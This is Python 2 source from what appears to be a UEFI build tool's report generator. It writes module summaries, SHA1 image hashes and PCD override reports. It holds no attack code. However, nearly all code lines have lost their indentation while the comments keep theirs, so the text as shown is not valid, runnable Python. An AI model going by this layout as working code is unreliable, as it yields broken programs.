# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
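        # The DEBUG/<ModuleName>.txt firmware report, when present, supplies the
        # module image size and the build time stamp used in the summary below.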
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
                # rebase the EFI image to 0 since its base address may not be zero;
                # this keeps the hash independent of the fixed load address
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception, X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
                    self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
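    # Forward lines read from a pipe (e.g. GenFw stderr) to the given logger
    # callable until EOF is reached or ExitFlag is set; run on a worker thread.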
while True:
        # read one line at a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
    # This constructor function generates a PcdReport object for a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
                    # this PCD has no resolved type; first check whether it already
                    # appears in the used PCD set under any type
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
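        # When ModulePcdSet is empty this is the platform-level report, so the
        # conditional-directive and unused-PCD sections are emitted first; the
        # main PCD detail section follows in either case.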
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
    # This function generates the PCD report for a platform build
    # or for a separate module build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
    # @param ReportSubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
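                # The reported value starts from the DEC default, is replaced by the
                # DSC default if present, then by an FDF override, then by the module
                # INF value (module reports only), and finally by a PCD set through
                # build options.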
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
DscDefaultValue = self.FdfPcdSet.get((Pcd.TokenCName, Key), DscDefaultValue)
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression, DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefault, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
Pcd.DefaultValue = PcdValue
if InfDefault == "":
InfDefault = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
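                # Numeric PCDs are compared as integers (so 0x10 matches 16), while
                # other datum types are compared as stripped strings, to decide which
                # default (DEC/INF/DSC) the final value matches.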
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.gStructurePcd[self.Arch]):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = OverrideValues.keys()
Data = OverrideValues[Keys[0]]
Struct = Data.values()[0]
DscOverride = self.ParseStruct(Struct)
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
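                # Flag legend: ' ' matches the DEC default, '*B' build option override,
                # '*F' FDF override, '*P' DSC (platform) override, '*M' module override.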
if DecMatch and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscMatch:
if (Pcd.TokenCName, Key) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, ModuleDefault.strip()))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
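        # Return True if any field of a structure PCD records a value whose source
        # file is a DSC, i.e. the structure was overridden in the platform DSC.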
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
if DecMatch and IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x','0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = OverrideValues.keys()
Data = OverrideValues[Keys[0]]
Struct = Data.values()[0]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct)
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
